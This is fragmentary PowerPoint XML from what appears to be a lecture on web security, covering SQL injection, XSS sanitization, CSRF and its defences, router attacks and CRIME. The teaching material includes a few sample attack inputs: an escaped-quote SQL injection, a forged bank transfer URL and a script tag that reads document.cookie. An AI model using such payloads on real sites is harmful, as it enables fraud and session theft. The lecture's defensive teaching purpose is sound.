              <a:t>sessionID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> = 1234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75961" y="3064527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75961" y="33339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01987" y="3358467"/>
            <a:ext cx="7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evil'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5058" y="4439908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0199" y="3690734"/>
            <a:ext cx="1665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* from users where username = ‘evil’’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75960" y="5162776"/>
            <a:ext cx="16002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40158" y="4766991"/>
            <a:ext cx="284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HORRIBLE ERROR, AAARGH!!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80545" y="5566053"/>
            <a:ext cx="7467600" cy="762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Sanitizing input once sometimes isn’t enough!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21373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3" grpId="0"/>
      <p:bldP spid="25" grpId="0"/>
      <p:bldP spid="27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Context-Specific Sanitization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22446"/>
            <a:ext cx="1240078" cy="1785712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flipH="1">
            <a:off x="6605505" y="1295400"/>
            <a:ext cx="2049546" cy="1988778"/>
          </a:xfrm>
          <a:prstGeom prst="arc">
            <a:avLst>
              <a:gd name="adj1" fmla="val 16200000"/>
              <a:gd name="adj2" fmla="val 5554325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29303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1" y="3060754"/>
            <a:ext cx="1905372" cy="1109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88655"/>
            <a:ext cx="1905372" cy="110909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124200" y="1883851"/>
            <a:ext cx="1447800" cy="1001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43153" y="3657600"/>
            <a:ext cx="1528847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4724400"/>
            <a:ext cx="1447800" cy="918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21" y="1625025"/>
            <a:ext cx="911250" cy="12600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172200" y="2057400"/>
            <a:ext cx="9144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37994" y="2408086"/>
            <a:ext cx="914400" cy="457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 flipV="1">
            <a:off x="3363206" y="4169851"/>
            <a:ext cx="2808994" cy="1854352"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -13983"/>
            </a:avLst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6085347" y="3894137"/>
            <a:ext cx="2049546" cy="1988778"/>
          </a:xfrm>
          <a:prstGeom prst="arc">
            <a:avLst>
              <a:gd name="adj1" fmla="val 300417"/>
              <a:gd name="adj2" fmla="val 4258914"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="63500">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:tailEnd type="none"/>
          </a:ln>
          <a:effectLst>
            <a:glow rad="101600">
              <a:schemeClr val="accent5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33237" y="340449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Sanitization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36196" y="5960871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XSS Sanitization</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="425381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escape.alf.nu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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8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Request Forgery (CSRF)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5EB2-6B99-4AC3-9F1C-DF6C6BCA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weekend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8EE41-C163-43B6-B037-7BB8C3F5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91" y="1371600"/>
            <a:ext cx="6339417" cy="4754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4CED-3D28-436F-96B0-BAE90FF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Recall: Session Cookies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219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6172200" y="1905000"/>
            <a:ext cx="1447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6454250" y="14478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1396992" y="1447800"/>
            <a:ext cx="1092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637574" y="2286000"/>
            <a:ext cx="3534626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 rot="345248">
            <a:off x="3416300" y="1828800"/>
            <a:ext cx="214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POST/login.cgi</a:t>
            </a:r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2667000" y="4495800"/>
            <a:ext cx="350520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 flipH="1">
            <a:off x="2667000" y="30480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>
            <a:off x="2667000" y="5410200"/>
            <a:ext cx="3505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 rot="-321107">
            <a:off x="2651125" y="2895600"/>
            <a:ext cx="356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Set-cookie: authenticator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 rot="404233">
            <a:off x="3168650" y="4037381"/>
            <a:ext cx="26130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GET…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cookie: authenticator</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55310" name="Text Box 17"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-321107">
            <a:off x="3856038" y="5210175"/>
            <a:ext cx="119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52400" y="3200400"/>
            <a:ext cx="2133600" cy="2057400"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 90576"/>
              <a:gd name="adj2" fmla="val 453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Sent on every page request...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...intentional or not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03" y="275977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14" y="990600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9552" y="5364176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7024" y="4105220"/>
            <a:ext cx="1102102" cy="110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01" y="3989640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899" y="23677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7448" y="3620308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9000" y="1447800"/>
            <a:ext cx="3733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02" y="1905000"/>
            <a:ext cx="1102102" cy="11021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26208" y="1219723"/>
            <a:ext cx="30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Authenticates with bank.com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353242" y="1867319"/>
            <a:ext cx="3580958" cy="8697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1975" y="2813877"/>
            <a:ext cx="597330" cy="60745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192400" y="2367707"/>
            <a:ext cx="3733800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5588" y="2867589"/>
            <a:ext cx="408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transfer?amount</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=500&amp;dest=grandson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16341" y="5244601"/>
            <a:ext cx="275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Cookie checks out! </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sending $500 to grandson</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27959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1.94444E-6 0.00023 C -0.00504 -0.00116 -0.00972 -0.00185 -0.01441 -0.00278 C -0.02552 -0.00532 -0.01042 -0.00324 -0.02413 -0.00556 C -0.02761 -0.00602 -0.0309 -0.00602 -0.03403 -0.00671 C -0.05816 -0.01134 -0.03195 -0.0081 -0.05816 -0.01065 L -0.09896 -0.01852 C -0.09896 -0.01829 -0.12743 -0.02384 -0.12743 -0.02361 L -0.13872 -0.02523 C -0.14306 -0.02639 -0.14705 -0.02824 -0.15156 -0.02917 C -0.16354 -0.03218 -0.16858 -0.03218 -0.18125 -0.0331 C -0.18542 -0.03403 -0.18976 -0.03449 -0.19393 -0.03565 C -0.2033 -0.03819 -0.2125 -0.04167 -0.22205 -0.04352 C -0.22639 -0.04468 -0.23056 -0.04491 -0.2349 -0.0463 C -0.2382 -0.04722 -0.24097 -0.04954 -0.24462 -0.05023 C -0.25313 -0.05139 -0.26163 -0.05093 -0.27014 -0.05139 C -0.28785 -0.05556 -0.26597 -0.05046 -0.28021 -0.05417 C -0.28195 -0.05463 -0.28386 -0.05486 -0.28577 -0.05532 C -0.28715 -0.05579 -0.28854 -0.05648 -0.29011 -0.05694 C -0.29636 -0.05833 -0.31389 -0.0625 -0.32101 -0.06319 L -0.33229 -0.06482 C -0.35799 -0.07269 -0.32604 -0.06319 -0.34792 -0.06875 C -0.35087 -0.06921 -0.35365 -0.07037 -0.35643 -0.0713 C -0.3592 -0.07199 -0.36181 -0.07338 -0.36493 -0.07384 L -0.37205 -0.07523 C -0.37379 -0.07593 -0.37552 -0.07732 -0.37761 -0.07778 C -0.38143 -0.0787 -0.38524 -0.07847 -0.38906 -0.07917 C -0.39028 -0.0794 -0.39167 -0.08009 -0.39323 -0.08056 C -0.39584 -0.08102 -0.39879 -0.08125 -0.40174 -0.08171 C -0.40469 -0.08241 -0.40729 -0.08357 -0.41024 -0.08449 C -0.41146 -0.08495 -0.41285 -0.08542 -0.41441 -0.08565 C -0.41615 -0.08611 -0.41823 -0.08657 -0.41997 -0.08704 C -0.44097 -0.09306 -0.4257 -0.08935 -0.43837 -0.09236 C -0.43993 -0.09329 -0.44097 -0.09421 -0.44254 -0.09491 C -0.44549 -0.09607 -0.44844 -0.09676 -0.45104 -0.09769 L -0.46389 -0.10162 L -0.47222 -0.10417 C -0.47379 -0.10463 -0.47518 -0.10556 -0.47656 -0.10556 L -0.47952 -0.10556 L -0.48629 -0.10787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23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29 -0.10787 L -0.00295 0.054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81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03" y="275977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14" y="990600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6065" y="518902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37024" y="4105220"/>
            <a:ext cx="1102102" cy="1102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06486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899" y="236770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2044" y="3736836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702" y="1905000"/>
            <a:ext cx="1102102" cy="1102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3542" y="937694"/>
            <a:ext cx="597330" cy="60745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68074" y="1432205"/>
            <a:ext cx="422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transfer?amount</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=10000&amp;dest=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>evilcorp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9064" y="5287310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Cookie checks out! </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sending $10000 to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>EvilCorp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05000" y="2286000"/>
            <a:ext cx="0" cy="1334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39004" y="2286000"/>
            <a:ext cx="0" cy="133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197" y="2904045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=“http://bank.com/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transfer?amount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=10000&amp;id=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evilcorp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4951" y="1820176"/>
            <a:ext cx="3549249" cy="11869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55665" y="4206486"/>
            <a:ext cx="4073735" cy="5941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9941" y="462548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$10000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1503" y="1831676"/>
            <a:ext cx="1237500" cy="12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55556E-6 L 2.22222E-6 -5.55556E-6 C 0.01771 0.0118 0.00191 -0.00024 0.01302 0.01157 C 0.02083 0.0199 0.01823 0.0155 0.02621 0.02175 C 0.02969 0.02453 0.03264 0.02823 0.03611 0.03055 C 0.03889 0.03263 0.04219 0.03333 0.04496 0.03495 C 0.04618 0.03587 0.04705 0.03726 0.04826 0.03796 C 0.05 0.03911 0.05191 0.03981 0.05382 0.04097 C 0.06111 0.04513 0.06857 0.0493 0.07569 0.05416 C 0.08316 0.05902 0.08906 0.06319 0.0967 0.06736 C 0.09878 0.06851 0.10104 0.06898 0.1033 0.07013 C 0.11094 0.0743 0.11823 0.08009 0.12621 0.08333 C 0.13003 0.08495 0.13368 0.08611 0.13732 0.08773 C 0.14062 0.08935 0.14392 0.09189 0.14722 0.09374 C 0.15 0.09513 0.15312 0.09629 0.1559 0.09814 C 0.15816 0.0993 0.16024 0.10138 0.1625 0.10254 C 0.16962 0.10578 0.16597 0.10208 0.17135 0.10532 C 0.19479 0.11967 0.17048 0.10624 0.19219 0.11851 C 0.1941 0.11967 0.19583 0.12083 0.19774 0.12152 C 0.20642 0.12499 0.2 0.12106 0.20764 0.1243 C 0.21059 0.12569 0.21354 0.12754 0.21649 0.1287 C 0.23611 0.13796 0.23073 0.13587 0.24496 0.1405 C 0.24601 0.14143 0.24705 0.14259 0.24826 0.14351 C 0.25 0.14467 0.25191 0.1456 0.25382 0.14629 C 0.2592 0.14884 0.26476 0.15115 0.27031 0.1537 L 0.27691 0.15671 C 0.27795 0.15717 0.27899 0.15763 0.28021 0.1581 C 0.2816 0.15856 0.28316 0.15879 0.28455 0.15948 C 0.28455 0.15948 0.29548 0.16689 0.29774 0.16828 C 0.29913 0.16944 0.30052 0.1706 0.30208 0.17129 C 0.30434 0.17222 0.3066 0.17314 0.30868 0.1743 C 0.31302 0.17638 0.31371 0.17708 0.31753 0.1787 C 0.31892 0.17916 0.32048 0.17962 0.32187 0.18009 C 0.32378 0.18148 0.32552 0.1831 0.32743 0.18448 C 0.32917 0.18564 0.33125 0.18611 0.33298 0.18749 C 0.33455 0.18865 0.33576 0.1905 0.33732 0.19189 C 0.33837 0.19259 0.33958 0.19259 0.34062 0.19328 C 0.34219 0.19421 0.34357 0.19513 0.34496 0.19629 C 0.34618 0.19768 0.34705 0.1993 0.34826 0.20069 C 0.34982 0.20231 0.35625 0.20717 0.35712 0.20786 C 0.35816 0.20879 0.3592 0.20995 0.36042 0.21087 C 0.3618 0.21203 0.36337 0.21296 0.36476 0.21388 C 0.36927 0.2162 0.36701 0.21365 0.36927 0.21666 L 0.36927 0.21828 " pathEditMode="relative" ptsTypes="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0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Request Forgery (CSRF)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>
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CSRF attack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causes the end user browser to execute unwanted actions on a web application in which it is currently authenticated.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6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Home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76713" y="1981200"/>
            <a:ext cx="1452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Cambria"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
                <a:cs typeface="Cambria"/>
              </a:rPr>
              <a:t>Home router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600201" y="4101925"/>
            <a:ext cx="5568700" cy="1093407"/>
            <a:chOff x="1600201" y="4101925"/>
            <a:chExt cx="5568700" cy="1093407"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="12" name="Straight Arrow Connector 20"/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flipH="1" flipV="1">
              <a:off x="1600201" y="4101925"/>
              <a:ext cx="5568700" cy="109340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9"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="539831">
              <a:off x="2891631" y="4245308"/>
              <a:ext cx="29321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3. malicious page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00201" y="3071813"/>
            <a:ext cx="2757487" cy="1030112"/>
            <a:chOff x="1600201" y="3071813"/>
            <a:chExt cx="2757487" cy="1030112"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="TextBox 24"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="20410878">
              <a:off x="1686026" y="3376911"/>
              <a:ext cx="178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4. </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" err="1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configs</a:t>
              </a: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 access</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="20" name="Straight Arrow Connector 23"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="25" idx="3"/>
              <a:endCxn id="22" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="1600201" y="3071813"/>
              <a:ext cx="2757487" cy="103011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22" name="Picture 2" descr="http://www.usc-b2b.com/UNIQUE/images/L2100001.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect l="21349" t="5804" r="17416" b="8801"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4357688" y="2347913"/>
            <a:ext cx="1038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ular Callout 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6094413" y="1600200"/>
            <a:ext cx="2744787" cy="1219200"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -80881"/>
              <a:gd name="adj2" fmla="val 5119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Attacker can enable remote admin, reset password, etc.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7487" y="3797125"/>
            <a:ext cx="1572714" cy="609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48400" y="5195332"/>
            <a:ext cx="1841002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Attacker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813844" y="2634734"/>
            <a:ext cx="3543844" cy="1162391"/>
            <a:chOff x="813844" y="2634734"/>
            <a:chExt cx="3543844" cy="1162391"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="TextBox 19"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1371600" y="2634734"/>
              <a:ext cx="20298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1. configure router</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="40" name="Elbow Connector 39"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="25" idx="0"/>
              <a:endCxn id="22" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="5400000" flipH="1" flipV="1">
              <a:off x="2223110" y="1662547"/>
              <a:ext cx="725312" cy="354384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13845" y="4406724"/>
            <a:ext cx="5434556" cy="1093408"/>
            <a:chOff x="813845" y="4406724"/>
            <a:chExt cx="5434556" cy="1093408"/>
          </a:xfrm>
        </p:grpSpPr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2010877" y="5130800"/>
              <a:ext cx="313940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Cambria"/>
                  <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
                  <a:cs typeface="Cambria"/>
                </a:rPr>
                <a:t>2. visits malicious site</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="42" name="Elbow Connector 41"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="25" idx="2"/>
              <a:endCxn id="26" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="16200000" flipH="1">
              <a:off x="2984419" y="2236150"/>
              <a:ext cx="1093407" cy="543455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5986985" y="3352800"/>
            <a:ext cx="2852215" cy="1295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50% of home routers have default or no pw*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00" y="6488668"/>
            <a:ext cx="672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source: “Drive-By Pharming”, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Stamm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> et al. Symantec report, 2006</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34248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1" grpId="0" animBg="1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CSRF Defenses</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="86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Secret Validation Token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Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t> Validation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Origin Validation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18125" y="61452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40458C"/>
              </a:solidFill>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="86032" name="Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3354387" y="2210583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&lt;input type=hidden value=23a3af01b&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8602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3943350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962933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354387" y="4075697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Referer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: http://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www.facebook.com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/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home.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-6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553200"/>
            <a:ext cx="576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Referrer is misspelled as “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>” in HTTP header field</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp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5642394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54387" y="5774741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Origin: http://www.facebook.com/home.php</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Multiply 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="990600" y="3204777"/>
            <a:ext cx="7924800" cy="1905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28850" y="3939292"/>
            <a:ext cx="5791200" cy="51922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Not designed for CSRF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17872" y="4921866"/>
            <a:ext cx="7924800" cy="1905000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56122" y="5656381"/>
            <a:ext cx="5791200" cy="51922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Firefox support is Incomplete</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40487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Secret Token Validation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="87043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Requests include a hard-to-guess secret</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>Unguessability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t> substitutes for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>unforgeability</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Variations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>Session identifier</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>Session-independent token</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>Session-dependent token</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>HMAC of session identifier</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="87045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65138"/>
            <a:ext cx="800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869281" y="1295400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&lt;input type=hidden value=23a3af01b&gt;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Token Validation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="88067" name="Content Placeholder 4" descr="Picture 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9982" r="-9982"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219200"/>
            <a:ext cx="8458200" cy="50577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7" y="5583238"/>
            <a:ext cx="825341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419600" y="5715000"/>
            <a:ext cx="4038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5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Referrer Validation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="89091" name="Content Placeholder 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 Origin header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9446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/>
              <a:t>Origin: http://www.facebook.com/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99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r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Origin: http://www.attacker.com/evil.html</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"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dirty="0"/>
              <a:t>    Origin: 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231900" y="4694237"/>
            <a:ext cx="6705600" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -30473"/>
              <a:gd name="adj2" fmla="val -105357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Lenient: Accept when not present (insecure)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Strict: Don’t accept when not present (secure)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p: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4700" y="362953"/>
            <a:ext cx="1524000" cy="7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5000" y="1570037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Origin: http://www.facebook.com/home.php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5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CRIME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84" y="1633707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33707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84" y="4063291"/>
            <a:ext cx="1240078" cy="178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93876" y="2768464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36811" y="5257800"/>
            <a:ext cx="1102102" cy="110210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90556" y="1911650"/>
            <a:ext cx="3443294" cy="1563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183578" y="2502796"/>
            <a:ext cx="3293422" cy="164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772" y="3101822"/>
            <a:ext cx="3657228" cy="18543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1103" y="2675663"/>
            <a:ext cx="297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Script that sends </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>forced requests to good.com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205" y="3401127"/>
            <a:ext cx="3416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Forced request to good.com </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>containing session token + some </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>attacker controlled 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7100" y="3776974"/>
            <a:ext cx="194617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Compressed, then</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Encrypted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0" y="4836420"/>
            <a:ext cx="1905372" cy="1109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4911" y="5508559"/>
            <a:ext cx="1219200" cy="12192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090556" y="4473422"/>
            <a:ext cx="1024244" cy="7081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9895" y="4878285"/>
            <a:ext cx="1722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Eavesdrop </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>on packet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91410" y="1181517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745" y="591978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good.com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19490" y="4946473"/>
            <a:ext cx="2562510" cy="704197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CSRF Defenses do not prevent this!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38010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7-02 at 4.08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524000"/>
            <a:ext cx="32512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Your Own Cookie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62000" y="1524000"/>
            <a:ext cx="4114800" cy="121920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&lt;script&gt;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alert(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>document.cookie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&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2" descr="Screen Shot 2012-07-02 at 4.1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497169"/>
            <a:ext cx="6273800" cy="29464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70224" y="4800600"/>
            <a:ext cx="3318435" cy="838200"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 72438"/>
              <a:gd name="adj2" fmla="val 2600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 session token</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13026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Frameworks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1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9097" y="1143000"/>
            <a:ext cx="1857703" cy="22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 descr="http://3.bp.blogspot.com/-VUzJ0jRHbgI/UiiX4WoOrmI/AAAAAAAABrY/tqZe0uQEA9Q/s1600/django-logo-negat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15" y="4622147"/>
            <a:ext cx="2401874" cy="10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308538"/>
            <a:ext cx="62956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CSRF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need to actually write SQL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XSS Sanitization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95362" y="2014211"/>
            <a:ext cx="5405438" cy="4572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nsolas" pitchFamily="49" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>&lt;input type=hidden value=23a3af01b&gt;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3461" y="3782188"/>
            <a:ext cx="5410200" cy="11430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Post.find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[:id]) =&gt;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“select * from posts where id=‘”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+ safe(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[:id]) + “’”</a:t>
            </a:r>
          </a:p>
